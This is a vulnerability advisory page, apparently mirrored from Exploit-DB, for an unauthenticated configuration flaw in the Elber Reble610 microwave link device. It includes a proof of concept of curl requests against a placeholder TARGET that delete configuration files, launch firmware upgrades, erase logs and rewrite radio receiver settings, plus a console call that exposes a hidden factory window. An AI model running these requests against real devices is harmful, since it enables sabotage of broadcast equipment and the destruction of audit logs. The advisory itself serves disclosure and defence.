Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Configuration Vulnerability

vendor:

Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Unauthenticated Device Configuration and Client-Side Hidden Functionality Disclosure

CWE

Product Name: Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device

Affected Version From: 0.01 Revision 0

Affected Version To: 0.01 Revision 0

Patch Exists: NO

Related CWE:

CPE: h:elber_s.r.l.:reble610_firmware:0.01

Metasploit:

Other Scripts:

Platforms Tested: NBFM Controller, embOS/IP

2023

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Configuration Vulnerability

The Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device allows an attacker to configure the device without authentication and reveals hidden functionality on the client-side. By exploiting this vulnerability, an unauthorized user can manipulate device settings and access undisclosed features.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict network access to the device, apply proper authentication mechanisms, and regularly monitor for any unauthorized configuration changes or activities.

Source

Exploit-DB raw data:

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0

Summary: The REBLE610 features an accurate hardware design, absence of
internal cabling and full modularity. The unit is composed by a basic
chassis with 4 extractable boards which makes maintenance and critical
operations, like frequency modification, easy and efficient. The modular
approach has brought to the development of the digital processing module
(containing modulator, demodulator and data interface) and the RF module
(containing Transmitter, Receiver and channel filters). From an RF point
of view, the new transmission circuitry is able to guarantee around 1 Watt
with every modulation scheme, introducing, in addition, wideband precorrection
(up to 1GHz depending on frequency band).

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5819
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.